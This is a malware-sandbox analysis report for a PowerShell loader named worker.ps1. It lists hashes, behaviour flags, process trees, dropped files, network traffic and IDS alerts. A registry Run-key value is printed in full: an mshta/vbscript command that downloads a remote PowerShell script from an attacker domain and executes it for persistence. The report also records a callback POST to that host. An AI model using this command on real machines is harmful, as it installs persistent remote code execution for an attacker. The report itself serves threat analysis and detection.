| File name: | worker.ps1 |
| Full analysis: | https://app.any.run/tasks/da1559f6-fabe-450c-a1ad-24952683bf32 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 16, 2025, 12:23:19 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | DFA164F1695A9BD6C212E61C9526B668 |
| SHA1: | 86CDD56775D65FD2AE79A64F13E8A49FA45C2FAA |
| SHA256: | 5CC0D46909BD6733DD331E2DFCEF5EF9B9A9EFB709B104C1C9A9D49026715065 |
| SSDEEP: | 384:CSXCaO3XjGdfaYxZCy4oyCPWhWJa7uZkOT4:CSXCZ39QP5S |
MALICIOUS
Bypass execution policy to execute commands
- powershell.exe (PID: 6980)
- powershell.exe (PID: 6592)
Changes powershell execution policy (Bypass)
- powershell.exe (PID: 6592)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 6592)
SUSPICIOUS
The process executes Powershell scripts
- powershell.exe (PID: 6592)
Application launched itself
- powershell.exe (PID: 6592)
Starts POWERSHELL.EXE for commands execution
- powershell.exe (PID: 6592)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 6592)
Checks a user's role membership (POWERSHELL)
- powershell.exe (PID: 6592)
Checks for external IP
- svchost.exe (PID: 2192)
- powershell.exe (PID: 6592)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6592)
Detects reflection assembly loader (YARA)
- powershell.exe (PID: 6592)
INFO
The process uses the downloaded file
- powershell.exe (PID: 6592)
Disables trace logs
- powershell.exe (PID: 6592)
Checks proxy server information
- powershell.exe (PID: 6592)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6592)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
126
Monitored processes
6
Malicious processes
2
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 624 | C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -Embedding | C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe | — | svchost.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Modules Installer Worker Version: 10.0.19041.3989 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6592 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\worker.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6600 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6980 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Temp\kh4u5v0b.jpe.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6988 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
16 081
Read events
16 078
Write events
3
Delete events
0
Modification events
| (PID) Process: | (6592) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | Google LLC Worker |
Value: mshta.exe vbscript:createobject("wscript.shell").run("powershell $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iex",0)(window.close) | |||
| (PID) Process: | (624) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdHigh |
Value: 31156241 | |||
| (PID) Process: | (624) TiWorker.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing |
| Operation: | write | Name: | SessionIdLow |
Value: | |||
Executable files
0
Suspicious files
5
Text files
7
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6A6OJQPKLJ2YR20HGR33.temp | binary | |
MD5:7E047FC95C6688D80E81AF70E7075AC4 | SHA256:32D1A280785309622E42BAF51A86A722172AE1D64D189C6B1AF678432382ABE3 | |||
| 6592 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ggss0m15.5fx.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF1360f0.TMP | binary | |
MD5:D040F64E9E7A2BB91ABCA5613424598E | SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670 | |||
| 6592 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yxybvz1n.qwx.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6592 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qs1ojt0v.c00.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:7E047FC95C6688D80E81AF70E7075AC4 | SHA256:32D1A280785309622E42BAF51A86A722172AE1D64D189C6B1AF678432382ABE3 | |||
| 6980 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:BDCB49E77CF80DCB08754C9155DBF63A | SHA256:D1F0D638F339CD4A470F906E03BDCC058E4D48D5AAF179BFFECD95B0F2EB741C | |||
| 6592 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:3F95A05381C6D14195F6A1538F5FBADE | SHA256:0E753E9AD3EDE811C17D076B462F85321B8F559C2E462AF0990A1653573A525F | |||
| 6980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gd2d04xa.hyg.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6980 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rk4zrsii.vdz.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
25
DNS requests
10
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6592 | powershell.exe | GET | 200 | 34.160.111.145:80 | http://ifconfig.me/ | unknown | — | — | shared |
440 | svchost.exe | GET | 304 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6592 | powershell.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json | unknown | — | — | shared |
— | — | GET | 200 | 49.12.234.183:443 | https://ident.me/ | unknown | text | 13 b | shared |
6592 | powershell.exe | POST | — | 146.70.233.10:8080 | http://encrypthub.org:8080/?method=Callback | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 2.23.227.221:443 | www.bing.com | Ooredoo Q.S.C. | QA | whitelisted |
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
440 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
440 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
ifconfig.me |
| shared |
ip-api.com |
| shared |
encrypthub.org |
| unknown |
ident.me |
| shared |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Lookup Domain (ifconfig .me) |
2192 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
6592 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
6592 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain (ifconfig .me) |
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
6592 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
6592 | powershell.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
6592 | powershell.exe | Device Retrieving External IP Address Detected | SUSPICIOUS [ANY.RUN] An IP address was received from the server as a result of an HTTP request |
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ident .me) |
6592 | powershell.exe | Device Retrieving External IP Address Detected | ET INFO Observed External IP Lookup Domain (ident .me) in TLS SNI |